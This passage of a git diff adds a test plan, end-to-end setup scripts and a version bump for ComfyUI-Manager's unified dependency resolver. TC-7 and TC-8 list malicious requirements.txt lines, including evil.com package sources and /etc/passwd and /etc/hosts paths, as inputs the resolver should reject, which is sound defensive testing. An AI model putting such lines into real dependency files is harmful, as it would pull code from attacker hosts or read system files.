+- Previously installed deps (from step 1) remain intact
+
+---
+
+## Test Fixture Setup
+
+Each TC that requires node packs should use isolated, deterministic fixtures:
+
+```bash
+# Create test node pack
+mkdir -p "$COMFY_ROOT/custom_nodes/test_pack_a"
+echo "chardet>=5.0" > "$COMFY_ROOT/custom_nodes/test_pack_a/requirements.txt"
+
+# Cleanup after test
+rm -rf "$COMFY_ROOT/custom_nodes/test_pack_a"
+```
+
+Ensure no other node packs in `custom_nodes/` interfere with expected counts. Use a clean `custom_nodes/` directory or account for existing packs in assertions.
+
+---
+
+## TC-1: Normal Batch Resolution [P0]
+
+**Precondition**: `use_unified_resolver = true`, uv installed, at least one node pack with `requirements.txt`
+
+**Steps**:
+1. Create `$COMFY_ROOT/custom_nodes/test_pack_a/requirements.txt` with content: `chardet>=5.0`
+2. Start ComfyUI
+
+**Expected log**:
+```
+[UnifiedDepResolver] Collected N deps from M sources (skipped 0)
+[UnifiedDepResolver] running: ... uv pip compile ...
+[UnifiedDepResolver] running: ... uv pip install ...
+[UnifiedDepResolver] startup batch resolution succeeded
+```
+
+**Verify**: Neither `Install: pip packages for` nor `Install: pip packages` appears in output (both per-node pip variants must be absent)
+
+---
+
+## TC-2: Disabled State (Default) [P1]
+
+**Precondition**: `use_unified_resolver = false` or key absent from config.ini
+
+**Steps**: Start ComfyUI
+
+**Verify**: No `[UnifiedDepResolver]` log output at all
+
+---
+
+## TC-3: Fallback When uv Unavailable [P0]
+
+**Precondition**: `use_unified_resolver = true`, uv completely unavailable
+
+**Steps**:
+1. Create a venv **without** uv installed (`uv` package not in venv)
+2. Ensure no standalone `uv` binary exists in `$PATH` (rename or use isolated `$PATH`)
+3. Start ComfyUI
+
+```bash
+# Reliable uv removal: both module and binary must be absent
+uv pip uninstall uv
+# Verify neither path works
+python -m uv --version 2>&1 | grep -q "No module" && echo "module uv: absent"
+which uv 2>&1 | grep -q "not found" && echo "binary uv: absent"
+```
+
+**Expected log**:
+```
+[UnifiedDepResolver] uv not available at startup, falling back to per-node pip
+```
+
+**Verify**:
+- `manager_util.use_unified_resolver` is reset to `False`
+- Subsequent node pack installations use per-node pip install normally
+
+---
+
+## TC-4: Fallback on Compile Failure [P0]
+
+**Precondition**: `use_unified_resolver = true`, conflicting dependencies
+
+**Steps**:
+1. Node pack A `requirements.txt`: `numpy==1.24.0`
+2. Node pack B `requirements.txt`: `numpy==1.26.0`
+3. Start ComfyUI
+
+**Expected log**:
+```
+[UnifiedDepResolver] startup batch failed: compile failed: ..., falling back to per-node pip
+```
+
+**Verify**:
+- `manager_util.use_unified_resolver` is reset to `False`
+- Falls back to per-node pip install normally
+
+---
+
+## TC-5: Fallback on Install Failure [P0]
+
+**Precondition**: `use_unified_resolver = true`, compile succeeds but install fails
+
+**Steps**:
+1. Create node pack with `requirements.txt`: `numpy<2`
+2. Force install failure by making the venv's `site-packages` read-only:
+```bash
+chmod -R a-w "$(python -c 'import site; print(site.getsitepackages()[0])')"
+```
+3. Start ComfyUI
+4. After test, restore permissions:
+```bash
+chmod -R u+w "$(python -c 'import site; print(site.getsitepackages()[0])')"
+```
+
+**Expected log**:
+```
+[UnifiedDepResolver] startup batch failed: ..., falling back to per-node pip
+```
+> The `...` contains raw stderr from `uv pip install` (e.g., permission denied errors).
+
+**Verify**:
+- `manager_util.use_unified_resolver` is reset to `False`
+- Falls back to per-node pip install
+
+---
+
+## TC-6: install.py Execution Preserved [P0]
+
+**Precondition**: `use_unified_resolver = true`, ComfyUI running with batch resolution succeeded
+
+**Steps**:
+1. While ComfyUI is running, install a node pack that has both `install.py` and `requirements.txt` via API:
+```bash
+curl -X POST http://localhost:8199/v2/manager/queue/task \
+ -H "Content-Type: application/json" \
+ -d '{
+ "ui_id": "test-installpy",
+ "client_id": "test-client",
+ "kind": "install",
+ "params": {
+ "id": "",
+ "version": "latest",
+ "selected_version": "latest",
+ "mode": "remote",
+ "channel": "default"
+ }
+ }'
+```
+> Choose a CNR node pack known to have both `install.py` and `requirements.txt`.
+> Alternatively, use the Manager UI to install the same pack.
+
+2. Check logs after installation
+
+**Verify**:
+- `Install: install script` is printed (install.py runs immediately during install)
+- `Install: pip packages` does NOT appear (deps deferred, not installed per-node)
+- Log: `[UnifiedDepResolver] deps deferred to startup batch resolution for `
+- After **restart**, the new pack's deps are included in batch resolution (`Collected N deps from M sources`)
+
+---
+
+## TC-7: Dangerous Pattern Rejection [P0]
+
+**Precondition**: `use_unified_resolver = true`
+
+**Steps**: Include any of the following in a node pack's `requirements.txt`:
+```
+-r ../../../etc/hosts
+--requirement secret.txt
+-e git+https://evil.com/repo
+--editable ./local
+-c constraint.txt
+--constraint external.txt
+--find-links http://evil.com/pkgs
+-f http://evil.com/pkgs
+evil_pkg @ file:///etc/passwd
+```
+
+**Expected log**:
+```
+[UnifiedDepResolver] rejected dangerous line: '...' from
+```
+
+**Verify**: Dangerous lines are skipped; remaining valid deps are installed normally
+
+---
+
+## TC-8: Path Separator Rejection [P0]
+
+**Precondition**: `use_unified_resolver = true`
+
+**Steps**: Node pack `requirements.txt`:
+```
+../evil/pkg
+bad\pkg
+./local_package
+```
+
+**Expected log**:
+```
+[UnifiedDepResolver] rejected path separator: '...' from
+```
+
+**Verify**: Lines with `/` or `\` in the package name portion are rejected; valid deps on other lines are processed normally
+
+---
+
+## TC-9: --index-url / --extra-index-url Separation [P0]
+
+**Precondition**: `use_unified_resolver = true`
+
+Test all four inline forms:
+
+| # | `requirements.txt` content | Expected package | Expected URL |
+|---|---------------------------|-----------------|--------------|
+| a | `torch --index-url https://example.com/whl` | `torch` | `https://example.com/whl` |
+| b | `torch --extra-index-url https://example.com/whl` | `torch` | `https://example.com/whl` |
+| c | `--index-url https://example.com/whl` (standalone) | *(none)* | `https://example.com/whl` |
+| d | `--extra-index-url https://example.com/whl` (standalone) | *(none)* | `https://example.com/whl` |
+
+**Steps**: Create a node pack with each variant (one at a time or combined with a valid package on a separate line)
+
+**Verify**:
+- Package spec is correctly extracted (or empty for standalone lines)
+- URL is passed as `--extra-index-url` to `uv pip compile`
+- Duplicate URLs across multiple node packs are deduplicated
+- Log: `[UnifiedDepResolver] extra-index-url: `
+
+---
+
+## TC-10: Credential Redaction [P0]
+
+**Precondition**: `use_unified_resolver = true`
+
+**Steps**: Node pack `requirements.txt`:
+```
+private-pkg --index-url https://user:token123@pypi.private.com/simple
+```
+
+**Verify**:
+- `user:token123` does NOT appear in logs
+- Masked as `****@` in log output
+
+---
+
+## TC-11: Disabled Node Packs Excluded [P1]
+
+**Precondition**: `use_unified_resolver = true`
+
+**Steps**: Test both disabled styles:
+1. New style: `custom_nodes/.disabled/test_pack/requirements.txt` with content: `numpy`
+2. Old style: `custom_nodes/test_pack.disabled/requirements.txt` with content: `requests`
+3. Start ComfyUI
+
+**Verify**: Neither disabled node pack's deps are collected (not included in `Collected N`)
+
+---
+
+## TC-12: No Dependencies [P2]
+
+**Precondition**: `use_unified_resolver = true`, only node packs without `requirements.txt`
+
+**Steps**: Start ComfyUI
+
+**Expected log**:
+```
+[UnifiedDepResolver] No dependencies to resolve
+```
+
+**Verify**: Compile/install steps are skipped; startup completes normally
+
+---
+
+## TC-13: Runtime Node Pack Install (Defer Behavior) [P1]
+
+**Precondition**: `use_unified_resolver = true`, batch resolution succeeded at startup
+
+**Steps**:
+1. Start ComfyUI and confirm batch resolution succeeds
+2. While ComfyUI is running, install a new node pack via API:
+```bash
+curl -X POST http://localhost:8199/v2/manager/queue/task \
+ -H "Content-Type: application/json" \
+ -d '{
+ "ui_id": "test-defer-1",
+ "client_id": "test-client",
+ "kind": "install",
+ "params": {
+ "id": "",
+ "version": "latest",
+ "selected_version": "latest",
+ "mode": "remote",
+ "channel": "default"
+ }
+ }'
+```
+> Replace `` with a real CNR node pack ID (e.g., from the Manager UI).
+> Alternatively, use the Manager UI to install a node pack.
+
+3. Check logs after installation
+
+**Verify**:
+- Log: `[UnifiedDepResolver] deps deferred to startup batch resolution for `
+- `Install: pip packages` does NOT appear
+- After ComfyUI **restart**, the new node pack's deps are included in batch resolution
+
+---
+
+## TC-14: Both Unified Resolver Code Paths [P0]
+
+Verify both code locations that guard per-node pip install behave correctly in unified mode:
+
+| Path | Guard Variable | Trigger | Location |
+|------|---------------|---------|----------|
+| Runtime install | `manager_util.use_unified_resolver` | API install while ComfyUI is running | `glob/manager_core.py` class method (~line 846) |
+| Startup lazy install | `_unified_resolver_succeeded` | Queued install processed at restart | `prestartup_script.py` `execute_lazy_install_script()` (~line 594) |
+
+> **Note**: The standalone `execute_install_script()` in `glob/manager_core.py` (~line 1881) also has a unified resolver guard but is reachable via `update-comfyui`, git-based node pack updates, gitclone operations, CLI, and legacy server paths. The guard is identical to the class method; see [Out of Scope](#out-of-scope-deferred).
+
+**Steps**:
+
+**Path 1 — Runtime API install (class method)**:
+```bash
+# While ComfyUI is running:
+curl -X POST http://localhost:8199/v2/manager/queue/task \
+ -H "Content-Type: application/json" \
+ -d '{
+ "ui_id": "test-path1",
+ "client_id": "test-client",
+ "kind": "install",
+ "params": {
+ "id": "",
+ "version": "latest",
+ "selected_version": "latest",
+ "mode": "remote",
+ "channel": "default"
+ }
+ }'
+```
+
+> Choose a CNR node pack that has both `install.py` and `requirements.txt`.
+
+**Path 2 — Startup lazy install (`execute_lazy_install_script`)**:
+1. Create a test node pack with both `install.py` and `requirements.txt`:
+```bash
+mkdir -p "$COMFY_ROOT/custom_nodes/test_pack_lazy"
+echo 'print("lazy install.py executed")' > "$COMFY_ROOT/custom_nodes/test_pack_lazy/install.py"
+echo "chardet" > "$COMFY_ROOT/custom_nodes/test_pack_lazy/requirements.txt"
+```
+2. Manually inject a `#LAZY-INSTALL-SCRIPT` entry into `install-scripts.txt`:
+```bash
+SCRIPTS_DIR="$COMFY_ROOT/user/__manager/startup-scripts"
+mkdir -p "$SCRIPTS_DIR"
+PYTHON_PATH=$(which python)
+echo "['$COMFY_ROOT/custom_nodes/test_pack_lazy', '#LAZY-INSTALL-SCRIPT', '$PYTHON_PATH']" \
+ >> "$SCRIPTS_DIR/install-scripts.txt"
+```
+3. Start ComfyUI (with `use_unified_resolver = true`)
+
+**Verify**:
+- Path 1: `[UnifiedDepResolver] deps deferred to startup batch resolution for ` appears, `install.py` runs immediately, `Install: pip packages` does NOT appear
+- Path 2: `lazy install.py executed` is printed (install.py runs at startup), `Install: pip packages for` does NOT appear for the pack (skipped because `_unified_resolver_succeeded` is True after batch resolution)
+
+---
+
+## TC-15: Behavior After Fallback in Same Process [P1]
+
+**Precondition**: Resolver failed at startup (TC-4 or TC-5 scenario)
+
+**Steps**:
+1. Set up conflicting deps (as in TC-4) and start ComfyUI (resolver fails, flag reset to `False`)
+2. While still running, install a new node pack via API:
+```bash
+curl -X POST http://localhost:8199/v2/manager/queue/task \
+ -H "Content-Type: application/json" \
+ -d '{
+ "ui_id": "test-postfallback",
+ "client_id": "test-client",
+ "kind": "install",
+ "params": {
+ "id": "",
+ "version": "latest",
+ "selected_version": "latest",
+ "mode": "remote",
+ "channel": "default"
+ }
+ }'
+```
+
+**Verify**:
+- New node pack uses per-node pip install (not deferred)
+- `Install: pip packages` appears normally
+- On next restart with conflicts resolved, unified resolver retries if config still `true`
+
+---
+
+## TC-16: Generic Exception Fallback [P1]
+
+**Precondition**: `use_unified_resolver = true`, an exception escapes before `resolve_and_install()`
+
+This covers the `except Exception` handler at `prestartup_script.py` (~line 793), distinct from `UvNotAvailableError` (TC-3) and `ResolveResult` failure (TC-4/TC-5). The generic handler catches errors in the import, `collect_node_pack_paths()`, `collect_base_requirements()`, or `UnifiedDepResolver.__init__()` — all of which run before the resolver's own internal error handling.
+
+**Steps**:
+1. Make the `custom_nodes` directory unreadable so `collect_node_pack_paths()` raises a `PermissionError`:
+```bash
+chmod a-r "$COMFY_ROOT/custom_nodes"
+```
+2. Start ComfyUI
+3. After test, restore permissions:
+```bash
+chmod u+r "$COMFY_ROOT/custom_nodes"
+```
+
+**Expected log**:
+```
+[UnifiedDepResolver] startup error: ..., falling back to per-node pip
+```
+
+**Verify**:
+- `manager_util.use_unified_resolver` is reset to `False`
+- Falls back to per-node pip install normally
+- Log pattern is `startup error:` (NOT `startup batch failed:` nor `uv not available`)
+
+---
+
+## TC-17: Restart Dependency Detection [P0]
+
+**Precondition**: `use_unified_resolver = true`, automated E2E scripts available
+
+This test verifies that the resolver correctly detects and installs dependencies for node packs added between restarts, incrementally building the dependency set.
+
+**Steps**:
+1. Boot ComfyUI with no custom node packs (Boot 1 — baseline)
+2. Verify baseline deps only (Manager's own deps)
+3. Stop ComfyUI
+4. Clone `ComfyUI-Impact-Pack` into `custom_nodes/`
+5. Restart ComfyUI (Boot 2)
+6. Verify Impact Pack deps are installed (`cv2`, `skimage`, `dill`, `scipy`, `matplotlib`)
+7. Stop ComfyUI
+8. Clone `ComfyUI-Inspire-Pack` into `custom_nodes/`
+9. Restart ComfyUI (Boot 3)
+10. Verify Inspire Pack deps are installed (`cachetools`, `webcolors`)
+
+**Expected log (each boot)**:
+```
+[UnifiedDepResolver] Collected N deps from M sources (skipped S)
+[UnifiedDepResolver] running: ... uv pip compile ...
+[UnifiedDepResolver] running: ... uv pip install ...
+[UnifiedDepResolver] startup batch resolution succeeded
+```
+
+**Verify**:
+- Boot 1: ~10 deps from ~10 sources; `cv2`, `dill`, `cachetools` are NOT installed
+- Boot 2: ~19 deps from ~18 sources; `cv2`, `skimage`, `dill`, `scipy`, `matplotlib` all importable
+- Boot 3: ~24 deps from ~21 sources; `cachetools`, `webcolors` also importable
+- Both packs show as loaded in logs
+
+**Automation**: Use `tests/e2e/scripts/` (setup → start → stop) with node pack cloning between boots.
+
+---
+
+## TC-18: Real Node Pack Integration [P0]
+
+**Precondition**: `use_unified_resolver = true`, network access to GitHub + PyPI
+
+Full pipeline test with real-world node packs (`ComfyUI-Impact-Pack` + `ComfyUI-Inspire-Pack`) to verify the resolver handles production requirements.txt files correctly.
+
+**Steps**:
+1. Set up E2E environment
+2. Clone both Impact Pack and Inspire Pack into `custom_nodes/`
+3. Direct-mode: instantiate `UnifiedDepResolver`, call `collect_requirements()` and `resolve_and_install()`
+4. Boot-mode: start ComfyUI and verify via logs
+
+**Expected behavior (direct mode)**:
+```
+--- Discovered node packs (3) --- # Manager, Impact, Inspire
+ ComfyUI-Impact-Pack
+ ComfyUI-Inspire-Pack
+ ComfyUI-Manager
+
+--- Phase 1: Collect Requirements ---
+ Total requirements: ~24
+ Skipped: 1 # SAM2 git+https:// URL
+ Extra index URLs: set()
+```
+
+**Verify**:
+- `git+https://github.com/facebookresearch/sam2.git` is correctly rejected with "rejected path separator"
+- All other dependencies are collected and resolved
+- After install, `cv2`, `PIL`, `scipy`, `skimage`, `matplotlib` are all importable
+- No conflicting version errors during compile
+
+**Automation**: Use `tests/e2e/scripts/` (setup → clone packs → start) with direct-mode resolver invocation.
+
+---
+
+## Validated Behaviors (from E2E Testing)
+
+The following behaviors were confirmed during manual E2E testing:
+
+### Resolver Pipeline
+- **3-phase pipeline**: Collect → `uv pip compile` → `uv pip install` works end-to-end
+- **Incremental detection**: Resolver discovers new node packs on each restart without reinstalling existing deps
+- **Dependency deduplication**: Overlapping deps from multiple packs are resolved to compatible versions
+
+### Security & Filtering
+- **`git+https://` rejection**: URLs like `git+https://github.com/facebookresearch/sam2.git` are rejected with "rejected path separator" — SAM2 is the only dependency skipped from Impact Pack
+- **Blacklist filtering**: `PackageRequirement` objects have `.name`, `.spec`, `.source` attributes; `collected.skipped` returns `[(spec_string, reason_string)]` tuples
+
+### Manager Integration
+- **Manager v4 endpoints**: All endpoints use `/v2/` prefix (e.g., `/v2/manager/queue/status`)
+- **`Blocked by policy`**: Expected when Manager is pip-installed and also symlinked in `custom_nodes/`; prevents legacy double-loading
+- **config.ini path**: Must be at `$COMFY_ROOT/user/__manager/config.ini`, not in the symlinked Manager dir
+
+### Environment
+- **PYTHONPATH requirement**: `comfy` is a local package (not pip-installed); `comfyui_manager` imports from `comfy`, so both require `PYTHONPATH=$COMFY_ROOT`
+- **HOME isolation**: `HOME=$E2E_ROOT/home` prevents host config contamination during boot
+
+---
+
+## Summary
+
+| TC | P | Scenario | Key Verification |
+|----|---|----------|------------------|
+| 1 | P0 | Normal batch resolution | compile → install pipeline |
+| 2 | P1 | Disabled state | No impact on existing behavior |
+| 3 | P0 | uv unavailable fallback | Flag reset + per-node resume |
+| 4 | P0 | Compile failure fallback | Flag reset + per-node resume |
+| 5 | P0 | Install failure fallback | Flag reset + per-node resume |
+| 6 | P0 | install.py preserved | deps defer, install.py immediate |
+| 7 | P0 | Dangerous pattern rejection | Security filtering |
+| 8 | P0 | Path separator rejection | `/` and `\` in package names |
+| 9 | P0 | index-url separation | All 4 variants + dedup |
+| 10 | P0 | Credential redaction | Log security |
+| 11 | P1 | Disabled packs excluded | Both `.disabled/` and `.disabled` suffix |
+| 12 | P2 | No dependencies | Empty pipeline |
+| 13 | P1 | Runtime install defer | Defer until restart |
+| 14 | P0 | Both unified resolver paths | runtime API (class method) + startup lazy install |
+| 15 | P1 | Post-fallback behavior | Per-node pip resumes in same process |
+| 16 | P1 | Generic exception fallback | Distinct from uv-absent and batch-failed |
+| 17 | P0 | Restart dependency detection | Incremental node pack discovery across restarts |
+| 18 | P0 | Real node pack integration | Impact + Inspire Pack full pipeline |
+| CLI-1 | P0 | CLI normal batch resolution | exit 0, deps installed |
+| CLI-2 | P1 | CLI no custom nodes | exit 0, graceful empty |
+| CLI-3 | P0 | CLI uv unavailable | exit 1, error message |
+| CLI-4 | P0 | CLI conflicting deps | exit 1, resolution failed |
+| CLI-5 | P0 | CLI dangerous pattern skip | exit 0, dangerous skipped |
+| CLI-6 | P0 | install --uv-compile single | per-node pip skipped, batch resolve |
+| CLI-7 | P0 | install --uv-compile multi | batch once after all installs |
+
+### Traceability
+
+| Feature Requirement | Test Cases |
+|---------------------|------------|
+| FR-1: Dependency collection | TC-1, TC-11, TC-12 |
+| FR-2: Input sanitization | TC-7, TC-8, TC-10 |
+| FR-3: Index URL handling | TC-9 |
+| FR-4: Batch resolution (compile) | TC-1, TC-4 |
+| FR-5: Batch install | TC-1, TC-5 |
+| FR-6: install.py preserved | TC-6, TC-14 |
+| FR-7: Startup batch integration | TC-1, TC-2, TC-3 |
+| Fallback behavior | TC-3, TC-4, TC-5, TC-15, TC-16 |
+| Disabled node pack exclusion | TC-11 |
+| Runtime defer behavior | TC-13, TC-14 |
+| FR-8: Restart discovery | TC-17 |
+| FR-9: Real-world compatibility | TC-17, TC-18 |
+| FR-2: Input sanitization (git URLs) | TC-8, TC-18 |
+| FR-10: CLI batch resolution | TC-CLI-1, TC-CLI-2, TC-CLI-3, TC-CLI-4, TC-CLI-5 |
+| FR-11: CLI install --uv-compile | TC-CLI-6, TC-CLI-7 |
diff --git a/pyproject.toml b/pyproject.toml
index 284e71c3..3564d0e7 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -5,7 +5,7 @@ build-backend = "setuptools.build_meta"
[project]
name = "comfyui-manager"
license = { text = "GPL-3.0-only" }
-version = "4.1b1"
+version = "4.1b2"
requires-python = ">= 3.9"
description = "ComfyUI-Manager provides features to install and manage custom nodes for ComfyUI, as well as various functionalities to assist with ComfyUI."
readme = "README.md"
diff --git a/tests/e2e/scripts/setup_e2e_env.sh b/tests/e2e/scripts/setup_e2e_env.sh
new file mode 100755
index 00000000..64faf637
--- /dev/null
+++ b/tests/e2e/scripts/setup_e2e_env.sh
@@ -0,0 +1,241 @@
+#!/usr/bin/env bash
+# setup_e2e_env.sh — Automated E2E environment setup for ComfyUI + Manager
+#
+# Creates an isolated ComfyUI installation with ComfyUI-Manager for E2E testing.
+# Idempotent: skips setup if marker file and key artifacts already exist.
+#
+# Input env vars:
+# E2E_ROOT — target directory (default: auto-generated via mktemp)
+# MANAGER_ROOT — manager repo root (default: auto-detected from script location)
+# COMFYUI_BRANCH — ComfyUI branch to clone (default: master)
+# PYTHON — Python executable (default: python3)
+#
+# Output (last line of stdout):
+# E2E_ROOT=/path/to/environment
+#
+# Exit: 0=success, 1=failure
+
+set -euo pipefail
+
+# --- Constants ---
+COMFYUI_REPO="https://github.com/comfyanonymous/ComfyUI.git"
+PYTORCH_CPU_INDEX="https://download.pytorch.org/whl/cpu"
+CONFIG_INI_CONTENT="[default]
+use_uv = true
+use_unified_resolver = true
+file_logging = false"
+
+# --- Logging helpers ---
+log() { echo "[setup_e2e] $*"; }
+err() { echo "[setup_e2e] ERROR: $*" >&2; }
+die() { err "$@"; exit 1; }
+
+# --- Detect manager root by walking up from script dir to find pyproject.toml ---
+detect_manager_root() {
+ local dir
+ dir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+ while [[ "$dir" != "/" ]]; do
+ if [[ -f "$dir/pyproject.toml" ]]; then
+ echo "$dir"
+ return 0
+ fi
+ dir="$(dirname "$dir")"
+ done
+ return 1
+}
+
+# --- Validate prerequisites ---
+validate_prerequisites() {
+ local py="${PYTHON:-python3}"
+ local missing=()
+
+ command -v git >/dev/null 2>&1 || missing+=("git")
+ command -v uv >/dev/null 2>&1 || missing+=("uv")
+ command -v "$py" >/dev/null 2>&1 || missing+=("$py")
+
+ if [[ ${#missing[@]} -gt 0 ]]; then
+ die "Missing prerequisites: ${missing[*]}"
+ fi
+
+ # Verify Python version >= 3.9
+ local py_version
+ py_version=$("$py" -c "import sys; print(f'{sys.version_info.major}.{sys.version_info.minor}')")
+ local major minor
+ major="${py_version%%.*}"
+ minor="${py_version##*.}"
+ if [[ "$major" -lt 3 ]] || { [[ "$major" -eq 3 ]] && [[ "$minor" -lt 9 ]]; }; then
+ die "Python 3.9+ required, found $py_version"
+ fi
+ log "Prerequisites OK (python=$py_version, git=$(git --version | awk '{print $3}'), uv=$(uv --version 2>&1 | awk '{print $2}'))"
+}
+
+# --- Check idempotency: skip if already set up ---
+check_already_setup() {
+ local root="$1"
+ if [[ -f "$root/.e2e_setup_complete" ]] \
+ && [[ -d "$root/comfyui" ]] \
+ && [[ -d "$root/venv" ]] \
+ && [[ -f "$root/comfyui/user/__manager/config.ini" ]] \
+ && [[ -L "$root/comfyui/custom_nodes/ComfyUI-Manager" ]]; then
+ log "Environment already set up at $root (marker file exists). Skipping."
+ echo "E2E_ROOT=$root"
+ exit 0
+ fi
+}
+
+# --- Verify the setup ---
+verify_setup() {
+ local root="$1"
+ local manager_root="$2"
+ local venv_py="$root/venv/bin/python"
+ local errors=0
+
+ log "Running verification checks..."
+
+ # Check ComfyUI directory
+ if [[ ! -f "$root/comfyui/main.py" ]]; then
+ err "Verification FAIL: comfyui/main.py not found"
+ ((errors++))
+ fi
+
+ # Check venv python
+ if [[ ! -x "$venv_py" ]]; then
+ err "Verification FAIL: venv python not executable"
+ ((errors++))
+ fi
+
+ # Check symlink
+ local link_target="$root/comfyui/custom_nodes/ComfyUI-Manager"
+ if [[ ! -L "$link_target" ]]; then
+ err "Verification FAIL: symlink $link_target does not exist"
+ ((errors++))
+ elif [[ "$(readlink -f "$link_target")" != "$(readlink -f "$manager_root")" ]]; then
+ err "Verification FAIL: symlink target mismatch"
+ ((errors++))
+ fi
+
+ # Check config.ini
+ if [[ ! -f "$root/comfyui/user/__manager/config.ini" ]]; then
+ err "Verification FAIL: config.ini not found"
+ ((errors++))
+ fi
+
+ # Check Python imports
+ # comfy is a local package inside ComfyUI (not pip-installed), and
+ # comfyui_manager.__init__ imports from comfy — both need PYTHONPATH
+ if ! PYTHONPATH="$root/comfyui" "$venv_py" -c "import comfy" 2>/dev/null; then
+ err "Verification FAIL: 'import comfy' failed"
+ ((errors++))
+ fi
+
+ if ! PYTHONPATH="$root/comfyui" "$venv_py" -c "import comfyui_manager" 2>/dev/null; then
+ err "Verification FAIL: 'import comfyui_manager' failed"
+ ((errors++))
+ fi
+
+ if [[ "$errors" -gt 0 ]]; then
+ die "Verification failed with $errors error(s)"
+ fi
+ log "Verification OK: all checks passed"
+}
+
+# ===== Main =====
+
+# Resolve MANAGER_ROOT
+if [[ -z "${MANAGER_ROOT:-}" ]]; then
+ MANAGER_ROOT="$(detect_manager_root)" || die "Cannot detect MANAGER_ROOT. Set it explicitly."
+fi
+MANAGER_ROOT="$(cd "$MANAGER_ROOT" && pwd)"
+log "MANAGER_ROOT=$MANAGER_ROOT"
+
+# Validate prerequisites
+validate_prerequisites
+
+PYTHON="${PYTHON:-python3}"
+COMFYUI_BRANCH="${COMFYUI_BRANCH:-master}"
+
+# Create or use E2E_ROOT
+CREATED_BY_US=false
+if [[ -z "${E2E_ROOT:-}" ]]; then
+ E2E_ROOT="$(mktemp -d -t e2e_comfyui_XXXXXX)"
+ CREATED_BY_US=true
+ log "Created E2E_ROOT=$E2E_ROOT"
+else
+ mkdir -p "$E2E_ROOT"
+ log "Using E2E_ROOT=$E2E_ROOT"
+fi
+
+# Idempotency check
+check_already_setup "$E2E_ROOT"
+
+# Cleanup trap: remove E2E_ROOT on failure only if we created it
+cleanup_on_failure() {
+ local exit_code=$?
+ if [[ "$exit_code" -ne 0 ]] && [[ "$CREATED_BY_US" == "true" ]]; then
+ err "Setup failed. Cleaning up $E2E_ROOT"
+ rm -rf "$E2E_ROOT"
+ fi
+}
+trap cleanup_on_failure EXIT
+
+# Step 1: Clone ComfyUI
+log "Step 1/8: Cloning ComfyUI (branch=$COMFYUI_BRANCH)..."
+if [[ -d "$E2E_ROOT/comfyui/.git" ]]; then
+ log " ComfyUI already cloned, skipping"
+else
+ git clone --depth=1 --branch "$COMFYUI_BRANCH" "$COMFYUI_REPO" "$E2E_ROOT/comfyui"
+fi
+
+# Step 2: Create virtual environment
+log "Step 2/8: Creating virtual environment..."
+if [[ -d "$E2E_ROOT/venv" ]]; then
+ log " venv already exists, skipping"
+else
+ uv venv "$E2E_ROOT/venv"
+fi
+VENV_PY="$E2E_ROOT/venv/bin/python"
+
+# Step 3: Install ComfyUI dependencies
+log "Step 3/8: Installing ComfyUI dependencies (CPU-only)..."
+uv pip install \
+ --python "$VENV_PY" \
+ -r "$E2E_ROOT/comfyui/requirements.txt" \
+ --extra-index-url "$PYTORCH_CPU_INDEX"
+
+# Step 4: Install ComfyUI-Manager (non-editable, production-like)
+log "Step 4/8: Installing ComfyUI-Manager..."
+uv pip install --python "$VENV_PY" "$MANAGER_ROOT"
+
+# Step 5: Create symlink for custom_nodes discovery
+log "Step 5/8: Creating custom_nodes symlink..."
+mkdir -p "$E2E_ROOT/comfyui/custom_nodes"
+local_link="$E2E_ROOT/comfyui/custom_nodes/ComfyUI-Manager"
+if [[ -L "$local_link" ]]; then
+ log " Symlink already exists, updating"
+ rm -f "$local_link"
+fi
+ln -s "$MANAGER_ROOT" "$local_link"
+
+# Step 6: Write config.ini to correct path
+log "Step 6/8: Writing config.ini..."
+mkdir -p "$E2E_ROOT/comfyui/user/__manager"
+echo "$CONFIG_INI_CONTENT" > "$E2E_ROOT/comfyui/user/__manager/config.ini"
+
+# Step 7: Create HOME isolation directories
+log "Step 7/8: Creating HOME isolation directories..."
+mkdir -p "$E2E_ROOT/home/.config"
+mkdir -p "$E2E_ROOT/home/.local/share"
+mkdir -p "$E2E_ROOT/logs"
+
+# Step 8: Verify setup
+log "Step 8/8: Verifying setup..."
+verify_setup "$E2E_ROOT" "$MANAGER_ROOT"
+
+# Write marker file
+date -Iseconds > "$E2E_ROOT/.e2e_setup_complete"
+
+# Clear the EXIT trap since setup succeeded
+trap - EXIT
+
+log "Setup complete."
+echo "E2E_ROOT=$E2E_ROOT"
diff --git a/tests/e2e/scripts/start_comfyui.sh b/tests/e2e/scripts/start_comfyui.sh
new file mode 100755
index 00000000..f97b8b79
--- /dev/null
+++ b/tests/e2e/scripts/start_comfyui.sh
@@ -0,0 +1,129 @@
+#!/usr/bin/env bash
+# start_comfyui.sh — Foreground-blocking ComfyUI launcher for E2E tests
+#
+# Starts ComfyUI in the background, then blocks the foreground until the server
+# is ready (or timeout). This makes it safe to call from subprocess.run() or
+# Claude's Bash tool — the call returns only when ComfyUI is accepting requests.
+#
+# Input env vars:
+# E2E_ROOT — (required) path to E2E environment from setup_e2e_env.sh
+# PORT — ComfyUI listen port (default: 8199)
+# TIMEOUT — max seconds to wait for readiness (default: 120)
+#
+# Output (last line on success):
+# COMFYUI_PID= PORT=
+#
+# Exit: 0=ready, 1=timeout/failure
+
+set -euo pipefail
+
+# --- Defaults ---
+PORT="${PORT:-8199}"
+TIMEOUT="${TIMEOUT:-120}"
+
+# --- Logging helpers ---
+log() { echo "[start_comfyui] $*"; }
+err() { echo "[start_comfyui] ERROR: $*" >&2; }
+die() { err "$@"; exit 1; }
+
+# --- Validate environment ---
+[[ -n "${E2E_ROOT:-}" ]] || die "E2E_ROOT is not set"
+[[ -d "$E2E_ROOT/comfyui" ]] || die "ComfyUI not found at $E2E_ROOT/comfyui"
+[[ -x "$E2E_ROOT/venv/bin/python" ]] || die "venv python not found at $E2E_ROOT/venv/bin/python"
+[[ -f "$E2E_ROOT/.e2e_setup_complete" ]] || die "Setup marker not found. Run setup_e2e_env.sh first."
+
+PY="$E2E_ROOT/venv/bin/python"
+COMFY_DIR="$E2E_ROOT/comfyui"
+LOG_DIR="$E2E_ROOT/logs"
+LOG_FILE="$LOG_DIR/comfyui.log"
+PID_FILE="$LOG_DIR/comfyui.pid"
+
+mkdir -p "$LOG_DIR"
+
+# --- Check/clear port ---
+if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
+ log "Port $PORT is in use. Attempting to stop existing process..."
+ # Try to read existing PID file
+ if [[ -f "$PID_FILE" ]]; then
+ OLD_PID="$(cat "$PID_FILE")"
+ if kill -0 "$OLD_PID" 2>/dev/null; then
+ kill "$OLD_PID" 2>/dev/null || true
